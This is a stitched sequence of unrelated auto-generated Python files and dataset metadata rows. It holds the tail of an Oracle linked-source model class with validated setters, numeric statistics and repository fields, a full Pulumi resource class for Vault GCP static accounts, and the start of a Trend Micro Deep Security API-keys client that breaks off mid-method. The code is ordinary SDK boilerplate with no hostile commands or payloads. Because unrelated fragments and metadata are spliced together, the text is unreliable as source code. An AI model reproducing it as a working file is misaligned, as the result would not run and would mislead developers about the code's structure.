type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbctrlbkppiece',
dbctrlbkppiece,
str,
True)
if type_error:
raise type_error
if (dbctrlbkppiece is not None
and not re.search('^$|^[^\\s]*$', dbctrlbkppiece)):
raise GeneratedClassesError(
"Invalid value for 'dbctrlbkppiece', was '{}' but must follow the"
" pattern '^$|^[^\\s]*$'.".format(dbctrlbkppiece))
self._dbctrlbkppiece = dbctrlbkppiece
@property
def password(self):
"""Gets the password of this LinkedSourceDefinition.
Oracle User Password
:return: The password of this LinkedSourceDefinition.
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this LinkedSourceDefinition.
Oracle User Password
:param password: The password of this LinkedSourceDefinition.
:type password: str
"""
# Validating the attribute password and then saving it.
if password is None:
raise GeneratedClassesError(
"The required parameter 'password' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'password',
password,
str,
True)
if type_error:
raise type_error
self._password = password
@property
def instance_name(self):
"""Gets the instance_name of this LinkedSourceDefinition.
Staging Instance Name
:return: The instance_name of this LinkedSourceDefinition.
:rtype: str
"""
return self._instance_name
@instance_name.setter
def instance_name(self, instance_name):
"""Sets the instance_name of this LinkedSourceDefinition.
Staging Instance Name
:param instance_name: The instance_name of this LinkedSourceDefinition.
:type instance_name: str
"""
# Validating the attribute instance_name and then saving it.
if instance_name is None:
raise GeneratedClassesError(
"The required parameter 'instance_name' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'instance_name',
instance_name,
str,
True)
if type_error:
raise type_error
self._instance_name = instance_name
@property
def dbrmanbkploc(self):
"""Gets the dbrmanbkploc of this LinkedSourceDefinition.
Backup Location with no ending \\
:return: The dbrmanbkploc of this LinkedSourceDefinition.
:rtype: str
"""
return self._dbrmanbkploc
@dbrmanbkploc.setter
def dbrmanbkploc(self, dbrmanbkploc):
"""Sets the dbrmanbkploc of this LinkedSourceDefinition.
Backup Location with no ending \\
:param dbrmanbkploc: The dbrmanbkploc of this LinkedSourceDefinition.
:type dbrmanbkploc: str
"""
# Validating the attribute dbrmanbkploc and then saving it.
if dbrmanbkploc is None:
raise GeneratedClassesError(
"The required parameter 'dbrmanbkploc' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbrmanbkploc',
dbrmanbkploc,
str,
True)
if type_error:
raise type_error
if (dbrmanbkploc is not None
and not re.search('^$|^[^\\s]*$', dbrmanbkploc)):
raise GeneratedClassesError(
"Invalid value for 'dbrmanbkploc', was '{}' but must follow the"
" pattern '^$|^[^\\s]*$'.".format(dbrmanbkploc))
self._dbrmanbkploc = dbrmanbkploc
| 43.192513
| 215
| 0.529281
| 2,008
| 24,231
| 6.202689
| 0.079183
| 0.057808
| 0.070654
| 0.043356
| 0.832356
| 0.789964
| 0.779045
| 0.728784
| 0.701887
| 0.645363
| 0
| 0.000843
| 0.412736
| 24,231
| 560
| 216
| 43.269643
| 0.87442
| 0.255252
| 0
| 0.722222
| 1
| 0
| 0.127862
| 0.018661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067901
| false
| 0.052469
| 0.018519
| 0
| 0.123457
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
df80adf9def3552704f6d80759b672ae53dc1f5a
| 23,469
|
py
|
Python
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-10-07T17:44:18.000Z
|
2022-03-30T20:46:33.000Z
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-10-11T18:13:07.000Z
|
2022-03-31T21:09:41.000Z
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-10-28T10:08:40.000Z
|
2020-03-17T14:20:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SecretStaticAccountArgs', 'SecretStaticAccount']
@pulumi.input_type
class SecretStaticAccountArgs:
def __init__(__self__, *,
backend: pulumi.Input[str],
service_account_email: pulumi.Input[str],
static_account: pulumi.Input[str],
bindings: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]] = None,
secret_type: Optional[pulumi.Input[str]] = None,
token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SecretStaticAccount resource.
:param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
:param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
:param pulumi.Input[str] static_account: Name of the Static Account to create
:param pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
:param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
pulumi.set(__self__, "backend", backend)
pulumi.set(__self__, "service_account_email", service_account_email)
pulumi.set(__self__, "static_account", static_account)
if bindings is not None:
pulumi.set(__self__, "bindings", bindings)
if secret_type is not None:
pulumi.set(__self__, "secret_type", secret_type)
if token_scopes is not None:
pulumi.set(__self__, "token_scopes", token_scopes)
@property
@pulumi.getter
def backend(self) -> pulumi.Input[str]:
"""
Path where the GCP Secrets Engine is mounted
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: pulumi.Input[str]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter(name="serviceAccountEmail")
def service_account_email(self) -> pulumi.Input[str]:
"""
Email of the GCP service account to manage.
"""
return pulumi.get(self, "service_account_email")
@service_account_email.setter
def service_account_email(self, value: pulumi.Input[str]):
pulumi.set(self, "service_account_email", value)
@property
@pulumi.getter(name="staticAccount")
def static_account(self) -> pulumi.Input[str]:
"""
Name of the Static Account to create
"""
return pulumi.get(self, "static_account")
@static_account.setter
def static_account(self, value: pulumi.Input[str]):
pulumi.set(self, "static_account", value)
@property
@pulumi.getter
def bindings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]:
"""
Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
"""
return pulumi.get(self, "bindings")
@bindings.setter
def bindings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]):
pulumi.set(self, "bindings", value)
@property
@pulumi.getter(name="secretType")
def secret_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
"""
return pulumi.get(self, "secret_type")
@secret_type.setter
def secret_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret_type", value)
@property
@pulumi.getter(name="tokenScopes")
def token_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
return pulumi.get(self, "token_scopes")
@token_scopes.setter
def token_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "token_scopes", value)
@pulumi.input_type
class _SecretStaticAccountState:
def __init__(__self__, *,
backend: Optional[pulumi.Input[str]] = None,
bindings: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]] = None,
secret_type: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
service_account_project: Optional[pulumi.Input[str]] = None,
static_account: Optional[pulumi.Input[str]] = None,
token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering SecretStaticAccount resources.
:param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
:param pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
:param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
:param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
:param pulumi.Input[str] service_account_project: Project the service account belongs to.
:param pulumi.Input[str] static_account: Name of the Static Account to create
:param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
if backend is not None:
pulumi.set(__self__, "backend", backend)
if bindings is not None:
pulumi.set(__self__, "bindings", bindings)
if secret_type is not None:
pulumi.set(__self__, "secret_type", secret_type)
if service_account_email is not None:
pulumi.set(__self__, "service_account_email", service_account_email)
if service_account_project is not None:
pulumi.set(__self__, "service_account_project", service_account_project)
if static_account is not None:
pulumi.set(__self__, "static_account", static_account)
if token_scopes is not None:
pulumi.set(__self__, "token_scopes", token_scopes)
@property
@pulumi.getter
def backend(self) -> Optional[pulumi.Input[str]]:
"""
Path where the GCP Secrets Engine is mounted
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter
def bindings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]:
"""
Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
"""
return pulumi.get(self, "bindings")
@bindings.setter
def bindings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]):
pulumi.set(self, "bindings", value)
@property
@pulumi.getter(name="secretType")
def secret_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
"""
return pulumi.get(self, "secret_type")
@secret_type.setter
def secret_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret_type", value)
@property
@pulumi.getter(name="serviceAccountEmail")
def service_account_email(self) -> Optional[pulumi.Input[str]]:
"""
Email of the GCP service account to manage.
"""
return pulumi.get(self, "service_account_email")
@service_account_email.setter
def service_account_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_account_email", value)
@property
@pulumi.getter(name="serviceAccountProject")
def service_account_project(self) -> Optional[pulumi.Input[str]]:
"""
Project the service account belongs to.
"""
return pulumi.get(self, "service_account_project")
@service_account_project.setter
def service_account_project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_account_project", value)
@property
@pulumi.getter(name="staticAccount")
def static_account(self) -> Optional[pulumi.Input[str]]:
"""
Name of the Static Account to create
"""
return pulumi.get(self, "static_account")
@static_account.setter
def static_account(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "static_account", value)
@property
@pulumi.getter(name="tokenScopes")
def token_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
return pulumi.get(self, "token_scopes")
@token_scopes.setter
def token_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "token_scopes", value)
class SecretStaticAccount(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend: Optional[pulumi.Input[str]] = None,
bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
secret_type: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
static_account: Optional[pulumi.Input[str]] = None,
token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Creates a Static Account in the [GCP Secrets Engine](https://www.vaultproject.io/docs/secrets/gcp/index.html) for Vault.
Each [static account](https://www.vaultproject.io/docs/secrets/gcp/index.html#static-accounts) is tied to a separately managed
Service Account, and can have one or more [bindings](https://www.vaultproject.io/docs/secrets/gcp/index.html#bindings) associated with it.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
import pulumi_vault as vault
this = gcp.service_account.Account("this", account_id="my-awesome-account")
gcp = vault.gcp.SecretBackend("gcp",
path="gcp",
credentials=(lambda path: open(path).read())("credentials.json"))
static_account = vault.gcp.SecretStaticAccount("staticAccount",
backend=gcp.path,
static_account="project_viewer",
secret_type="access_token",
token_scopes=["https://www.googleapis.com/auth/cloud-platform"],
service_account_email=this.email,
bindings=[vault.gcp.SecretStaticAccountBindingArgs(
resource=this.project.apply(lambda project: f"//cloudresourcemanager.googleapis.com/projects/{project}"),
roles=["roles/viewer"],
)])
```
## Import
A static account can be imported using its Vault Path. For example, referencing the example above,
```sh
$ pulumi import vault:gcp/secretStaticAccount:SecretStaticAccount static_account gcp/static-account/project_viewer
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
:param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
:param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
:param pulumi.Input[str] static_account: Name of the Static Account to create
:param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SecretStaticAccountArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Creates a Static Account in the [GCP Secrets Engine](https://www.vaultproject.io/docs/secrets/gcp/index.html) for Vault.
Each [static account](https://www.vaultproject.io/docs/secrets/gcp/index.html#static-accounts) is tied to a separately managed
Service Account, and can have one or more [bindings](https://www.vaultproject.io/docs/secrets/gcp/index.html#bindings) associated with it.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
import pulumi_vault as vault
this = gcp.service_account.Account("this", account_id="my-awesome-account")
gcp = vault.gcp.SecretBackend("gcp",
path="gcp",
credentials=(lambda path: open(path).read())("credentials.json"))
static_account = vault.gcp.SecretStaticAccount("staticAccount",
backend=gcp.path,
static_account="project_viewer",
secret_type="access_token",
token_scopes=["https://www.googleapis.com/auth/cloud-platform"],
service_account_email=this.email,
bindings=[vault.gcp.SecretStaticAccountBindingArgs(
resource=this.project.apply(lambda project: f"//cloudresourcemanager.googleapis.com/projects/{project}"),
roles=["roles/viewer"],
)])
```
## Import
A static account can be imported using its Vault Path. For example, referencing the example above,
```sh
$ pulumi import vault:gcp/secretStaticAccount:SecretStaticAccount static_account gcp/static-account/project_viewer
```
:param str resource_name: The name of the resource.
:param SecretStaticAccountArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SecretStaticAccountArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend: Optional[pulumi.Input[str]] = None,
bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
secret_type: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
static_account: Optional[pulumi.Input[str]] = None,
token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SecretStaticAccountArgs.__new__(SecretStaticAccountArgs)
if backend is None and not opts.urn:
raise TypeError("Missing required property 'backend'")
__props__.__dict__["backend"] = backend
__props__.__dict__["bindings"] = bindings
__props__.__dict__["secret_type"] = secret_type
if service_account_email is None and not opts.urn:
raise TypeError("Missing required property 'service_account_email'")
__props__.__dict__["service_account_email"] = service_account_email
if static_account is None and not opts.urn:
raise TypeError("Missing required property 'static_account'")
__props__.__dict__["static_account"] = static_account
__props__.__dict__["token_scopes"] = token_scopes
__props__.__dict__["service_account_project"] = None
super(SecretStaticAccount, __self__).__init__(
'vault:gcp/secretStaticAccount:SecretStaticAccount',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
backend: Optional[pulumi.Input[str]] = None,
bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
secret_type: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
service_account_project: Optional[pulumi.Input[str]] = None,
static_account: Optional[pulumi.Input[str]] = None,
token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'SecretStaticAccount':
"""
Get an existing SecretStaticAccount resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
:param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
:param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
:param pulumi.Input[str] service_account_project: Project the service account belongs to.
:param pulumi.Input[str] static_account: Name of the Static Account to create
:param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SecretStaticAccountState.__new__(_SecretStaticAccountState)
__props__.__dict__["backend"] = backend
__props__.__dict__["bindings"] = bindings
__props__.__dict__["secret_type"] = secret_type
__props__.__dict__["service_account_email"] = service_account_email
__props__.__dict__["service_account_project"] = service_account_project
__props__.__dict__["static_account"] = static_account
__props__.__dict__["token_scopes"] = token_scopes
return SecretStaticAccount(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def backend(self) -> pulumi.Output[str]:
"""
Path where the GCP Secrets Engine is mounted
"""
return pulumi.get(self, "backend")
@property
@pulumi.getter
def bindings(self) -> pulumi.Output[Optional[Sequence['outputs.SecretStaticAccountBinding']]]:
"""
Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
"""
return pulumi.get(self, "bindings")
@property
@pulumi.getter(name="secretType")
def secret_type(self) -> pulumi.Output[str]:
"""
Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
"""
return pulumi.get(self, "secret_type")
@property
@pulumi.getter(name="serviceAccountEmail")
def service_account_email(self) -> pulumi.Output[str]:
"""
Email of the GCP service account to manage.
"""
return pulumi.get(self, "service_account_email")
@property
@pulumi.getter(name="serviceAccountProject")
def service_account_project(self) -> pulumi.Output[str]:
"""
Project the service account belongs to.
"""
return pulumi.get(self, "service_account_project")
@property
@pulumi.getter(name="staticAccount")
def static_account(self) -> pulumi.Output[str]:
"""
Name of the Static Account to create
"""
return pulumi.get(self, "static_account")
@property
@pulumi.getter(name="tokenScopes")
def token_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
"""
return pulumi.get(self, "token_scopes")
| 48.489669
| 248
| 0.67276
| 2,690
| 23,469
| 5.656877
| 0.080297
| 0.082408
| 0.067162
| 0.044818
| 0.872248
| 0.84859
| 0.839784
| 0.825721
| 0.808241
| 0.790892
| 0
| 0.000055
| 0.22583
| 23,469
| 483
| 249
| 48.590062
| 0.83747
| 0.385019
| 0
| 0.679842
| 1
| 0
| 0.128824
| 0.058439
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158103
| false
| 0.003953
| 0.027668
| 0
| 0.280632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10e2e09c13037747bff3d97730e99ec3387750dc
| 48,100
|
py
|
Python
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class APIKeysApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_api_key(self, api_key, api_version, **kwargs): # noqa: E501
"""Create an API Key # noqa: E501
Create a new API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_api_key(api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ApiKey api_key: The settings of the new API key. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
else:
(data) = self.create_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
return data
def create_api_key_with_http_info(self, api_key, api_version, **kwargs): # noqa: E501
"""Create an API Key # noqa: E501
Create a new API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_api_key_with_http_info(api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ApiKey api_key: The settings of the new API key. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key' is set
if ('api_key' not in params or
params['api_key'] is None):
raise ValueError("Missing the required parameter `api_key` when calling `create_api_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `create_api_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'api_key' in params:
body_params = params['api_key']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_api_key(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Delete an API Key # noqa: E501
Delete an API key by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_api_key(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.delete_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
return data
def delete_api_key_with_http_info(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Delete an API Key # noqa: E501
Delete an API key by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_api_key_with_http_info(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `delete_api_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `delete_api_key`") # noqa: E501
if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `api_key_id` when calling `delete_api_key`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'api_key_id' in params:
path_params['apiKeyID'] = params['api_key_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/{apiKeyID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def describe_api_key(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Describe an API Key # noqa: E501
Describe an API key by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_api_key(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
return data
